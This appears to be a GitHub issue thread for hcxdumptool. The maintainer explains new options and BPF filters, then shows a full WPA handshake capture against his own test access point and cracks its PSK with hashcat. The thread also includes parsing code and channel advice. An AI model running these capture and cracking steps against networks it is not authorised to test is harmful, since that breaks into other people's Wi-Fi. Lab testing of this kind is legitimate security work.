Comments (114)
These options (--filterlist_ap=my filter.txt, --filternode=3 or --enable_status=1) have been removed since v6.3.0.
From now on, it is mandatory to add a Berkeley Packet Filter (BPF) that does the entire filtering.
More information is here:
#343
#330
as well as here:
$ hcxdumptool --help
and in changelog:
https://github.com/ZerBea/hcxdumptool/blob/master/changelog#L83
Closed this report here, because these changes are wanted and announced.
from hcxdumptool.
Option "enable_status=1" has been replaced by "rds=1" and the slow waterfall display has been replaced by a fast split screen.
Options "filterlist_ap=my filter.txt" and "filternode=3" have been replaced by "bpf=filter.bpfc".
How to build the Berkeley Packet Filter is explained in help.
from hcxdumptool.
A typical command line (scan all frequencies supported by the interface) is
$ sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1 -F
In case of filtering:
$ sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1 -F --bpf=filter.bpf
In case of using a single channel, e.g. channel 1:
$ sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1 -c 1a
Scan only main channel 1, 6 and 11 on 2.4GHz band:
$ sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1
Or any other combination of the new options.
Please take a look at help to get an overview of all options and the legend of the new split screen.
from hcxdumptool.
Quick follow-up question. On NetHunter and Kali Linux PC, any command with a "--" before it throws "unrecognised option", for example --disable_deauthentication or --do_rcascan.
from hcxdumptool.
This option "--do_rcascan" has been replaced by "--rcascan=active".
If you don't change that, you'll get an ERROR:
$ sudo hcxdumptool -i wlp48s0f4u2u4 --do_rcascan
hcxdumptool: unrecognized option '--do_rcascan'
hcxdumptool 6.3.1-69-g532cc54 (C) 2023 by ZeroBeat
usage: hcxdumptool -h for help
Running the new style, everything should be fine:
$ sudo hcxdumptool -i wlp48s0f4u2u4 --rcascan=active
Requesting physical interface capabilities. This may take some time.
Please be patient...
or to scan all frequencies:
$ sudo hcxdumptool -i wlp48s0f4u2u4 --rcascan=active -F
Requesting physical interface capabilities. This may take some time.
Please be patient...
from hcxdumptool.
Also attack.bpf is empty. Use command hcxdumptool -m wlan0
tcpdump -i wlan0 wlan addr 11:4C:69:08:50:BB -ddd > attack.bpf writes an empty file.
from hcxdumptool.
Has the man page not been updated yet?
from hcxdumptool.
Command line is wrong.
Your command line:
$ sudo tcpdump -i wlan0 wlan addr 11:4C:69:08:50:BB -ddd > attack.bpf
tcpdump: can't parse filter expression: syntax error
correct command line:
$ sudo tcpdump -i wlan0 wlan addr3 11:4C:69:08:50:BB -ddd > attack.bpf
$ cat attack.bpf
16
48 0 0 3
100 0 0 8
7 0 0 0
48 0 0 2
76 0 0 0
2 0 0 0
7 0 0 0
80 0 0 0
84 0 0 12
21 5 0 4
64 0 0 18
21 0 3 1762152635
72 0 0 16
21 0 1 4428
6 0 0 262144
6 0 0 0
from hcxdumptool.
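The listing above is the only thing hcxdumptool's --bpf= option reads: a count line followed by one "opcode jt jf k" line per classic BPF instruction. The following is an added example (not hcxdumptool's or tcpdump's code) that parses that text, checks the count line, disassembles it, and executes it with a small cBPF interpreter against three constructed frames: a beacon from the target BSSID, an undirected probe request whose addr3 is the broadcast address, and an ACK. The target MAC is the one from the thread; the client MAC, the 8-byte radiotap header and the frame contents are made up. The first seven instructions read the radiotap length field at offset 2 and park it in X, which is why the filter has to be compiled on an interface that is up and in monitor mode (DLT_IEEE802_11_RADIO); the jeq on the frame-control type bits drops control frames, which carry no addr3.

```python
"""Decode and execute a classic BPF program in `tcpdump -ddd` text format.

Added example, not hcxdumptool's or tcpdump's own code. FILTER_DDD is the program
the thread shows for `tcpdump -i wlan0 wlan addr3 11:4C:69:08:50:BB -ddd`; the frames
it is run against are constructed below (target BSSID from the thread, client MAC made up).
"""

# first line: instruction count; then "opcode jt jf k" per instruction (the --bpf= file format)
FILTER_DDD = ("16\n48 0 0 3\n100 0 0 8\n7 0 0 0\n48 0 0 2\n76 0 0 0\n2 0 0 0\n7 0 0 0\n80 0 0 0\n"
              "84 0 0 12\n21 5 0 4\n64 0 0 18\n21 0 3 1762152635\n72 0 0 16\n21 0 1 4428\n"
              "6 0 0 262144\n6 0 0 0\n")

# opcode layout: class in bits 0x07, size or X-source in 0x18/0x08, mode or operation in 0xe0/0xf0
ALU = {0x00: ("add", lambda a, s: a + s), 0x10: ("sub", lambda a, s: a - s),
       0x20: ("mul", lambda a, s: a * s), 0x30: ("div", lambda a, s: a // s),
       0x40: ("or", lambda a, s: a | s), 0x50: ("and", lambda a, s: a & s),
       0x60: ("lsh", lambda a, s: a << (s & 31)), 0x70: ("rsh", lambda a, s: a >> (s & 31)),
       0x80: ("neg", lambda a, s: -a), 0x90: ("mod", lambda a, s: a % s), 0xa0: ("xor", lambda a, s: a ^ s)}
JMP = {0x00: ("ja", None), 0x10: ("jeq", lambda a, s: a == s), 0x20: ("jgt", lambda a, s: a > s),
       0x30: ("jge", lambda a, s: a >= s), 0x40: ("jset", lambda a, s: (a & s) != 0)}


def parse_ddd(text):
    """Parse `tcpdump -ddd` output into (code, jt, jf, k) tuples, checking the count line."""
    rows = [tuple(int(v) for v in line.split()) for line in text.split("\n") if line.strip()]
    insns = rows[1:]
    if rows[0] != (len(insns),) or any(len(i) != 4 for i in insns):
        raise ValueError("instruction count does not match the program body")
    return insns


def disasm(insns):
    """tcpdump -d style listing with absolute jump targets."""
    out = []
    for i, (code, jt, jf, k) in enumerate(insns):
        cls, imm = code & 0x07, "x" if code & 0x08 else f"#{k:#x}"
        if cls in (0, 1):  # ld / ldx: operand size in bits 0x18, addressing mode in bits 0xe0
            size = {0x00: "", 0x08: "h", 0x10: "b"}[code & 0x18]
            src = {0x00: f"#{k}", 0x20: f"[{k}]", 0x40: f"[x+{k}]", 0x60: f"M[{k}]", 0x80: "len"}[code & 0xe0]
            out.append(f"{'ldx' if cls else 'ld'}{size} {src}")
        elif cls in (2, 3):
            out.append(f"{'stx' if cls == 3 else 'st'} M[{k}]")
        elif cls == 4:
            out.append(f"{ALU[code & 0xf0][0]} {imm}")
        elif cls == 5:
            name = JMP[code & 0xf0][0]
            out.append(f"ja {i + 1 + k}" if name == "ja" else f"{name} {imm} jt {i + 1 + jt} jf {i + 1 + jf}")
        elif cls == 6:
            out.append("ret " + {0x00: f"#{k}", 0x08: "x", 0x10: "a"}[code & 0x18])
        else:
            out.append("tax" if (code & 0xf8) == 0 else "txa")
    return out


def run_bpf(insns, pkt):
    """Execute insns over pkt as the kernel would; returns the accept length (0 = frame dropped)."""
    a = x = pc = 0
    mem = [0] * 16

    def load(off, size):  # a load past the packet end terminates the program with 0
        if off < 0 or off + size > len(pkt):
            raise IndexError
        return int.from_bytes(pkt[off:off + size], "big")

    while pc < len(insns):
        code, jt, jf, k = insns[pc]
        pc += 1
        cls, src = code & 0x07, (x if code & 0x08 else k)
        try:
            if cls in (0, 1):
                size = {0x00: 4, 0x08: 2, 0x10: 1}[code & 0x18]
                mode = code & 0xe0
                val = (k if mode == 0x00 else load(k, size) if mode == 0x20 else
                       load(x + k, size) if mode == 0x40 else mem[k] if mode == 0x60 else
                       len(pkt) if mode == 0x80 else (load(k, 1) & 0x0f) << 2)
                a, x = (val, x) if cls == 0 else (a, val)
            elif cls in (2, 3):
                mem[k] = a if cls == 2 else x
            elif cls == 4:
                name, fn = ALU[code & 0xf0]
                if name in ("div", "mod") and src == 0:
                    return 0
                a = fn(a, src) & 0xffffffff
            elif cls == 5:
                name, fn = JMP[code & 0xf0]
                pc += k if name == "ja" else (jt if fn(a, src) else jf)
            elif cls == 6:
                return {0x00: k, 0x08: x, 0x10: a}[code & 0x18]
            else:
                a, x = (a, a) if (code & 0xf8) == 0 else (x, x)  # tax / txa
        except IndexError:
            return 0
    return 0


def radiotap_80211(fc0, addr1, addr2=None, addr3=None):
    """Constructed frame: 8-byte radiotap header with no fields, then an 802.11 MAC header."""
    rt = bytes([0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00])  # version 0, pad, len 8 LE, present 0
    mac = bytes([fc0, 0x00]) + b"\x00\x00" + addr1                # frame control, duration, addr1
    if addr2 is not None:
        mac += addr2 + addr3 + b"\x00\x00"                        # addr2, addr3, sequence control
    return rt + mac


AP = bytes.fromhex("114c690850bb")       # the target from the thread
CLIENT = bytes.fromhex("020000000001")   # made-up, locally administered client MAC
BCAST = b"\xff" * 6
PROGRAM = parse_ddd(FILTER_DDD)


def filter_results(program=PROGRAM):
    """Run the filter over a beacon from the target, an undirected probe request and an ACK."""
    return {"beacon": run_bpf(program, radiotap_80211(0x80, BCAST, AP, AP)),             # addr3 = target BSSID
            "probe_request": run_bpf(program, radiotap_80211(0x40, BCAST, CLIENT, BCAST)),  # addr3 = broadcast
            "ack": run_bpf(program, radiotap_80211(0xd4, AP))}                            # control frame, no addr3
```

`filter_results()` gives `{"beacon": 262144, "probe_request": 0, "ack": 0}`: the beacon is accepted with tcpdump's default snaplen, while the undirected probe request is dropped because its addr3 is ff:ff:ff:ff:ff:ff, which is exactly the "missing frames" situation the thread discusses below and the reason for adding `or wlan addr3 ff:ff:ff:ff:ff:ff` to the filter.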
The default man page of hcxdumptool points to "--help":
https://github.com/ZerBea/hcxdumptool/blob/master/man/hcxdumptool.1
It doesn't need an update.
If your manpage is different it is not created by me.
from hcxdumptool.
Sorry, in the command line I do add "addr1".
Also "man hcxdumptool" brings a whole new list of commands.
from hcxdumptool.
Not my manpage.
from hcxdumptool.
Arch Linux doesn't need a manpage (like Debian). So it is not installed by default and the makefile doesn't have an entry to install this manpage.
https://github.com/ZerBea/hcxdumptool/blob/master/Makefile
Maybe you have an old manpage (if you have not uninstalled the old version before you installed the new version) or a manpage created by a package maintainer.
from hcxdumptool.
Ahhh, so confusing lol.
New error.
tcpdump: ethernet address used in non-ether expression, after trying to make the bpf file.
from hcxdumptool.
Forget last. My mistake.
from hcxdumptool.
tcpdump will show this error if the interface is not in monitor mode and not up.
from hcxdumptool.
If the target AP is not on channel 1a, 6a or 11a, don't forget to set the operation channel of the AP by option "-c" or scan all frequencies by option "-F".
Default scan is 1a, 6a and 11a, only.
from hcxdumptool.
I didn't insert "wlan" before addr3, just -I wlan0 addr3.
from hcxdumptool.
Ok
from hcxdumptool.
My channel is 11, so "-c 11a" is for 2.4 GHz.
from hcxdumptool.
Please also notice that running this filter:
$ sudo tcpdump -i wlan0 wlan addr3 11:4C:69:08:50:BB -ddd > attack.bpf
You'll get a warning (missing frames) from hcxpcapngtool when converting the dump file to hc22000 format, because undirected proberequest frames are filtered out, too.
To avoid that, add a BROADCAST MAC to your filter:
$ sudo tcpdump -i wlan0 wlan addr3 11:4C:69:08:50:BB or wlan addr3 ff:ff:ff:ff:ff:ff -ddd > attack.bpf
Additionally, you can tell hcxdumptool to terminate if you got a PMKID or a handshake:
--exitoneapol=<type> : exit on first EAPOL occurrence:
bitmask:
1 = PMKID
2 = EAPOL M2
4 = EAPOL M3
from hcxdumptool.
Would this adapter work: Alfa Network AWUS036AC Long-Range Dual-Band, chipset RTL8812AU, both bands?
Is there a difference between addr1 and addr3?
from hcxdumptool.
The RTL8812AU driver is not part of the stock Linux kernel.
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/tree/drivers/net/wireless/realtek?h=v6.5.8
and you need to install a third party driver.
Please read the adapter section of README.md (recommended and not recommended chipsets/drivers).
Please also read this:
morrownr/USB-WiFi#314
There is a difference between addr1, addr2, addr3 and addr4:
addr1 = to
addr2 = from
addr3 = BSSID
addr4 = wireless distribution systems
https://www.geeksforgeeks.org/ieee-802-11-mac-frame/
https://www.rfwireless-world.com/Articles/WLAN-MAC-layer-protocol.html
from hcxdumptool.
You're a legend, thanks so much for your help. Is there a dual-band adapter you would recommend? Currently using the TP-Link TL-WN722N 2.4 GHz.
from hcxdumptool.
Are there any other solutions to single out a specific AP to attack? This doesn't seem to work like you said.
from hcxdumptool.
ALFA AWUS036ACM
ALFA AWUS036ACHM
Both drivers are well maintained and part of the Linux kernel.
Both support active monitor mode.
Give me a few minutes to run a test.
from hcxdumptool.
here we go:
TP-Link TL-WN722N v1:
$ lsusb
ID 0cf3:9271 Qualcomm Atheros Communications AR9271 802.11n
build filter:
$ sudo hcxdumptool -m wlp48s0f4u2u4
$ sudo tcpdump -i wlp48s0f4u2u4 wlan addr3 08:96:d7:98:e1:9e -ddd > attack.bpf
For this test we do not need frames addressed to BROADCAST MAC and they are filtered out.
run attack against target test AP:
$ sudo hcxdumptool -i wlp48s0f4u2u4 --rds=1 -w tlwn722v1.pcapng -c 10a --bpf=attack.bpf
CHA LAST R 1 3 P S MAC-AP ESSID (last EAPOL on top) SCAN-FREQUENCY: 2457
-----------------------------------------------------------------------------------------
[ 10] 18:55:06 + + + + 0896d798e19e AP_7272
LAST E 2 MAC-AP-ROGUE MAC-CLIENT ESSID (last M2ROGUE on top)
-----------------------------------------------------------------------------------------
18:54:59 0896d798e19e 00e62d021987 AP_7272
282 packet(s) captured
1 SHB written to pcapng dumpfile
1 IDB written to pcapng dumpfile
1 ECB written to pcapng dumpfile
31 EPB written to pcapng dumpfile
exit on sigterm
bye-bye
convert to hc22000 format:
$ hcxpcapngtool -o test.22000 tlwn722v1.pcapng
hcxpcapngtool 6.3.1-109-gac0db30 reading from tlwn722v1.pcapng...
summary capture file
--------------------
file name................................: tlwn722v1.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 6.5.8-arch1-1
application..............................: hcxdumptool 6.3.1-69-g532cc54
interface name...........................: wlp48s0f4u2u4
interface vendor.........................: f81a67
openSSL version..........................: 1.1
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: 000da76303f4 (incremented on every new client)
MAC CLIENT...............................: c02250d406bb
REPLAYCOUNT..............................: 62460
ANONCE...................................: 4655d441f5e986d1c7102b72799bd537abc7a9c8dc150391bf988a2d0a8db87b
SNONCE...................................: 3c2c9d4853f5cfad58cde9c27e0aef9b0c80899f33e2664a21ea8a04c8df4464
timestamp minimum (GMT)..................: 24.10.2023 18:54:57
timestamp maximum (GMT)..................: 24.10.2023 18:54:59
duartion of the dump tool (seconds)......: 1
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)..............: little endian
packets inside...........................: 31
frames with correct FCS..................: 31
packets received on 2.4 GHz..............: 31
ESSID (total unique).....................: 1
BEACON (total)...........................: 1
BEACON on 2.4 GHz channel (from IE_TAG)..: 10
PROBERESPONSE (total)....................: 1
AUTHENTICATION (total)...................: 3
AUTHENTICATION (OPEN SYSTEM).............: 3
ASSOCIATIONREQUEST (total)...............: 2
ASSOCIATIONREQUEST (PSK).................: 2
EAPOL messages (total)...................: 24
EAPOL RSN messages.......................: 24
EAPOLTIME gap (measured maximum msec)....: 52
EAPOL ANONCE error corrections (NC)......: not detected
REPLAYCOUNT gap (measured maximum).......: 4
EAPOL M1 messages (total)................: 18
EAPOL M2 messages (total)................: 2
EAPOL M3 messages (total)................: 2
EAPOL M4 messages (total)................: 2
EAPOL M4 messages (zeroed NONCE).........: 2
EAPOL pairs (total)......................: 4
EAPOL pairs (best).......................: 1
EAPOL pairs written to 22000 hash file...: 1 (RC checked)
EAPOL M32E2 (authorized).................: 1
frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
2457: 31
Information: missing frames!
This dump file does not contain undirected proberequest frames.
An undirected proberequest may contain information about the PSK.
It always happens if the capture file was cleaned or
it could happen if filter options are used during capturing.
That makes it hard to recover the PSK.
session summary
---------------
processed pcapng files................: 1
hcxpcapngtool has detected the absence of frames addressed to BROADCAST MAC and told us that (missing frames).
Try to recover the PSK:
$ hashcat -m 22000 test.22000 -a 6 12345678
hashcat (v6.2.6-812-g8a206a9c0) starting
...
12e5828236c9a5a54795dde9b2b9d0f1:0896d798e19e:00e62d021987:AP_7272:12345678
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: test.22000
Time.Started.....: Tue Oct 24 19:01:45 2023 (0 secs)
Time.Estimated...: Tue Oct 24 19:01:45 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: 12345678 [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 73 H/s (0.42ms) @ Accel:32 Loops:256 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 12345678 -> 12345678
Hardware.Mon.#1..: Temp: 42c Fan: 0% Util: 59% Core:2835MHz Mem:10802MHz Bus:16
Started: Tue Oct 24 19:01:44 2023
Stopped: Tue Oct 24 19:01:46 2023
For this test I configured a very simple PSK 12345678, which was successfully recovered by hashcat.
Conclusion:
It took only 2 seconds to perform the attack:
timestamp minimum (GMT)..................: 24.10.2023 18:54:57
timestamp maximum (GMT)..................: 24.10.2023 18:54:59
The PSK has been successfully recovered.
from hcxdumptool.
Same test using a TP-LINK TL-WN722N v2/v3:
device information
$ lsusb
ID 2357:010c TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS]
attack using the already created filter:
$ sudo hcxdumptool -i wlp22s0f0u9u3 --rds=1 -w tlwn722v3.pcapng -c 10a --bpf=attack.bpf
CHA LAST R 1 3 P S MAC-AP ESSID (last EAPOL on top) SCAN-FREQUENCY: 2457
-----------------------------------------------------------------------------------------
[ 10] 19:09:45 + + + + 0896d798e19e AP_7272
LAST E 2 MAC-AP-ROGUE MAC-CLIENT ESSID (last M2ROGUE on top)
-----------------------------------------------------------------------------------------
19:09:43 0896d798e19e 00e62d021987 AP_7272
^C
209 packet(s) captured
1 SHB written to pcapng dumpfile
1 IDB written to pcapng dumpfile
1 ECB written to pcapng dumpfile
25 EPB written to pcapng dumpfile
exit on sigterm
bye-bye
convert to hc22000:
$ hcxpcapngtool -o testv3.22000 tlwn722v3.pcapng
hcxpcapngtool 6.3.1-109-gac0db30 reading from tlwn722v3.pcapng...
summary capture file
--------------------
file name................................: tlwn722v3.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 6.5.8-arch1-1
application..............................: hcxdumptool 6.3.1-69-g532cc54
interface name...........................: wlp22s0f0u9u3
interface vendor.........................: 9ca2f4
openSSL version..........................: 1.1
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: 111111300a88 (incremented on every new client)
MAC CLIENT...............................: a4a6a9dcefde
REPLAYCOUNT..............................: 64838
ANONCE...................................: 3b82ddb85e3fa8b4fd787bab084e310bec96f5fb4d008ec3f7766ecb55b69ff1
SNONCE...................................: 672a67b17e2bd2cd43e9b258b2bf066c8ecace54ba76b48c3cf2a1771a06c10c
timestamp minimum (GMT)..................: 24.10.2023 19:09:39
timestamp maximum (GMT)..................: 24.10.2023 19:09:43
duartion of the dump tool (seconds)......: 3
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)..............: little endian
packets inside...........................: 25
packets received on 2.4 GHz..............: 25
ESSID (total unique).....................: 1
BEACON (total)...........................: 1
BEACON on 2.4 GHz channel (from IE_TAG)..: 10
PROBERESPONSE (total)....................: 1
AUTHENTICATION (total)...................: 3
AUTHENTICATION (OPEN SYSTEM).............: 3
ASSOCIATIONREQUEST (total)...............: 1
ASSOCIATIONREQUEST (PSK).................: 1
EAPOL messages (total)...................: 19
EAPOL RSN messages.......................: 19
EAPOLTIME gap (measured maximum msec)....: 51
EAPOL ANONCE error corrections (NC)......: not detected
REPLAYCOUNT gap (measured maximum).......: 2
EAPOL M1 messages (total)................: 14
EAPOL M2 messages (total)................: 1
EAPOL M3 messages (total)................: 2
EAPOL M4 messages (total)................: 2
EAPOL M4 messages (zeroed NONCE).........: 2
EAPOL pairs (total)......................: 2
EAPOL pairs (best).......................: 1
EAPOL pairs written to 22000 hash file...: 1 (RC checked)
EAPOL M32E2 (authorized).................: 1
frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
2457: 25
Information: missing frames!
This dump file does not contain undirected proberequest frames.
An undirected proberequest may contain information about the PSK.
It always happens if the capture file was cleaned or
it could happen if filter options are used during capturing.
That makes it hard to recover the PSK.
session summary
---------------
processed pcapng files................: 1
recover the PSK:
$ hashcat -m 22000 testv3.22000 -a 3 12345678
hashcat (v6.2.6-812-g8a206a9c0) starting
...
5ad4260e96fd4d538a11545708a5bb1b:0896d798e19e:00e62d021987:AP_7272:12345678
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: testv3.22000
Time.Started.....: Tue Oct 24 19:14:11 2023 (0 secs)
Time.Estimated...: Tue Oct 24 19:14:11 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: 12345678 [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 73 H/s (0.42ms) @ Accel:64 Loops:256 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1/1 (100.00%)
Rejected.........: 0/1 (0.00%)
Restore.Point....: 0/1 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 12345678 -> 12345678
Hardware.Mon.#1..: Temp: 37c Fan: 0% Util: 75% Core:2850MHz Mem:10802MHz Bus:16
Started: Tue Oct 24 19:14:10 2023
Stopped: Tue Oct 24 19:14:12 2023
PSK has been successfully recovered by hashcat.
from hcxdumptool.
TP-Link TL-WN722N v1 and v2/v3 driver overview:
$ hcxdumptool -L
Requesting physical interface capabilities. This may take some time.
Please be patient...
available wlan devices:
phy idx hw-mac virtual-mac m ifname driver (protocol)
---------------------------------------------------------------------------------------------
6 9 9ca2f4093af0 9ca2f4093af0 + wlp22s0f0u9u3 rtl8xxxu (NETLINK)
7 10 f81a67077d0e f81a67077d0e + wlp22s0f0u9u1 ath9k_htc (NETLINK)
* active monitor mode available
+ monitor mode available
- no monitor mode available
bye-bye
from hcxdumptool.
Please notice:
It is mandatory that you know which services on your system are configured and running.
It is also mandatory that you stop them if they take access to the device.
All tests are done running Arch Linux on x86-64 systems (RYZEN platform) and Raspbian OS Lite on armv6 systems (Raspberry Pi platform).
Both Arch Linux and Raspbian are installed and configured by hand. There are absolutely no unwanted services running!
from hcxdumptool.
Bit of a problem: with or without -c 11a, on the scan screen it puts me on to channel 8.
from hcxdumptool.
That is more related to the hardware and caused by overlapped channels.
Take a look at this picture:
https://technologyuk.net/telecommunications/telecom-principles/images/telecom-principles-0075.gif
If the center frequency is on 2.437 GHz (channel 6), you receive signals from channels 4, 5 and 7, 8, too.
Depending on the bandwidth and the proximity to the transmitter, it can be less or more.
There are explanations on the web, e.g.:
https://electronics.stackexchange.com/questions/155643/why-do-wifi-channels-overlap
https://serverfault.com/questions/152920/what-happens-when-wifi-channels-overlap
https://witestlab.poly.edu/blog/ieee-802-11-wlans-using-partially-overlapped-channels/
BTW:
The actual operation frequency is displayed on the top right corner of the status display.
from hcxdumptool.
Usually an AP announces (IE-TAG) its operating frequency inside the BEACON:
Tag: DS Parameter set: Current Channel: 1
Tag Number: DS Parameter set (3)
Tag length: 1
Current Channel: 1
If hcxdumptool's operating channel is e.g. channel 3 and it receives a signal from an overlapped channel (e.g. channel 1), it evaluates this tag and shows the real operating frequency of the signal.
Top right corner: hcxdumptool's operating frequency (2422 MHz == channel 3)
Column CHA: operating frequency of the received AP (from IE-TAG).
CHA LAST R 1 3 P S MAC-AP ESSID (last seen on top) SCAN-FREQUENCY: 2422
-----------------------------------------------------------------------------------------
[ 1] 16:22:00 ...............................
hcxdumptool will not attack the target if it is not on the same frequency/channel.
from hcxdumptool.
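The two replies above describe what hcxdumptool does with the address fields and the DS Parameter Set tag. The following is an added example, not hcxdumptool's code, that does the same on one frame: it walks the radiotap header to the Channel field (the frequency the interface was tuned to), decodes frame control and the To DS/From DS bits to tell which address slot holds the BSSID (addr3 for management frames, as stated above; the example also covers the data-frame placements), and reads the SSID and DS Parameter Set tags from a beacon. The beacon is constructed here with the thread's test AP 0896d798e19e / AP_7272 announcing channel 1 while the frame was received on 2422 MHz (channel 3), the mismatch described above; the radiotap layout, capability bits and beacon interval are made up.

```python
"""Extract the 802.11 addresses and the advertised channel from a radiotap-encapsulated frame.

Added example, not hcxdumptool's code. The beacon it parses is constructed below with
the thread's test AP (0896d798e19e, ESSID AP_7272) announcing channel 1 in its DS Parameter
Set while the capturing interface is tuned to 2422 MHz (channel 3).
"""
import struct

# Radiotap fields in present-bit order: (bit, size, alignment). Walking the first four is
# enough to reach the Channel field (bit 3); later fields are not needed here.
RADIOTAP_FIELDS = [(0, 8, 8), (1, 1, 1), (2, 1, 1), (3, 4, 2)]  # TSFT, Flags, Rate, Channel


def freq_to_channel(mhz):
    """Centre frequency in MHz -> IEEE channel number (2.4 and 5 GHz bands)."""
    if mhz == 2484:
        return 14
    if 2412 <= mhz <= 2472:
        return (mhz - 2407) // 5
    if 5000 < mhz < 6000:
        return (mhz - 5000) // 5
    return None


def parse_radiotap(pkt):
    """Return (radiotap header length, receive frequency in MHz or None)."""
    version, _pad, length, present = struct.unpack_from("<BBHI", pkt, 0)
    if version != 0:
        raise ValueError("unsupported radiotap version")
    off, words = 8, [present]
    while words[-1] & (1 << 31):                      # extended present bitmaps follow
        words.append(struct.unpack_from("<I", pkt, off)[0])
        off += 4
    freq = None
    for bit, size, align in RADIOTAP_FIELDS:
        if present & (1 << bit):
            off = (off + align - 1) // align * align  # radiotap fields are naturally aligned
            if bit == 3:
                freq = struct.unpack_from("<H", pkt, off)[0]
            off += size
    return length, freq


def parse_80211(mac):
    """Decode frame control, the address slots and, for beacons/probes, the tagged parameters."""
    fc0, fc1 = mac[0], mac[1]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    to_ds, from_ds = fc1 & 0x1, (fc1 >> 1) & 0x1
    a1, a2, a3 = mac[4:10], mac[10:16], mac[16:22]
    if ftype == 1:                                    # control frames: only addr1 (RA) is guaranteed
        return {"type": "control", "subtype": subtype, "addr1": a1.hex(":")}
    # addr1 is always the receiver and addr2 the transmitter; which slot holds the BSSID
    # depends on To DS / From DS (both zero for management frames, so addr3 = BSSID there)
    if not to_ds and not from_ds:
        bssid, da, sa = a3, a1, a2
    elif from_ds and not to_ds:
        bssid, da, sa = a2, a1, a3                    # AP -> client
    elif to_ds and not from_ds:
        bssid, da, sa = a1, a3, a2                    # client -> AP
    else:
        bssid, da, sa = None, a3, mac[24:30]          # WDS: addr4 carries the source
    info = {"type": {0: "management", 2: "data"}.get(ftype, "reserved"), "subtype": subtype,
            "bssid": bssid.hex(":") if bssid else None, "da": da.hex(":"), "sa": sa.hex(":")}
    if ftype == 0 and subtype in (4, 5, 8):           # probe request, probe response, beacon
        ies = mac[24:] if subtype == 4 else mac[36:]  # beacon/probe response carry 12 fixed bytes first
        off = 0
        while off + 2 <= len(ies):
            tag, ln = ies[off], ies[off + 1]
            val = ies[off + 2:off + 2 + ln]
            if tag == 0:
                info["essid"] = val.decode("utf-8", "replace")
            elif tag == 3 and ln == 1:
                info["ds_channel"] = val[0]           # DS Parameter Set: channel the AP operates on
            off += 2 + ln
    return info


def parse_frame(pkt):
    rt_len, freq = parse_radiotap(pkt)
    info = parse_80211(pkt[rt_len:])
    info["rx_freq"], info["rx_channel"] = freq, freq_to_channel(freq) if freq else None
    return info


def build_beacon(bssid, essid, ds_channel, rx_freq):
    """Constructed beacon: radiotap with only the Channel field present, then the 802.11 frame."""
    rt = struct.pack("<BBHI", 0, 0, 12, 1 << 3) + struct.pack("<HH", rx_freq, 0x0080)  # 0x0080: 2 GHz flag
    hdr = bytes([0x80, 0x00]) + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    fixed = struct.pack("<QHH", 0, 100, 0x0411)       # timestamp, beacon interval, capabilities (made up)
    ies = bytes([0, len(essid)]) + essid.encode() + bytes([3, 1, ds_channel])
    return rt + hdr + fixed + ies


def example():
    """The case from the thread: interface on 2422 MHz (channel 3), AP announcing channel 1."""
    return parse_frame(build_beacon(bytes.fromhex("0896d798e19e"), "AP_7272", 1, 2422))
```

`example()` reports `rx_channel` 3 from the radiotap header and `ds_channel` 1 from the IE, which is what the CHA column versus the SCAN-FREQUENCY corner of the status display shows; a tool that only trusted the receive frequency would mis-attribute the AP to channel 3.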
BTW:
hcxpcapngtool prints both pieces of information after reading a pcapng dump file:
BEACON on 2.4 GHz channel (from IE_TAG)..: 1 2 3 4 5 6 7 8 9 11 13
BEACON on 5/6 GHz channel (from IE_TAG)..: 36 40 44
...
frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
2412: 1833 2417: 30 2422: 4 2427: 32
2432: 216 2437: 1280 2442: 35 2447: 312
2452: 16 2457: 2 2462: 3890 2467: 7
2472: 8 5180: 27 5200: 11 5220: 20
5240: 4
from hcxdumptool.
If you take a look at the frequency statistics from the radiotap header, you can imagine why hcxdumptool scans channels 1a (2412), 6a (2437) and 11a (2462) by default only.
from hcxdumptool.
Cool, thanks, will research it. All working on Kali Linux and NetHunter.
from hcxdumptool.
What does hcxdumptool do that it must be used in a safe environment?
from hcxdumptool.
I guess you mean this:
BPF is unset! Make sure hcxdumptool is running in a 100% controlled environment!
Simply explained: hcxdumptool is an angry and hungry beast; by default it attacks everything.
But it can be completely controlled by a BPF and by its options, and it's up to the user to control it.
from hcxdumptool.
But what does it do by default, without a BPF filter, to make it such a hungry beast?
from hcxdumptool.
- Capture all EAPOL (that include EAP hashes) hashes.
- REASSOCIATE EVERY connected CLIENT and request all EAPOL M2.
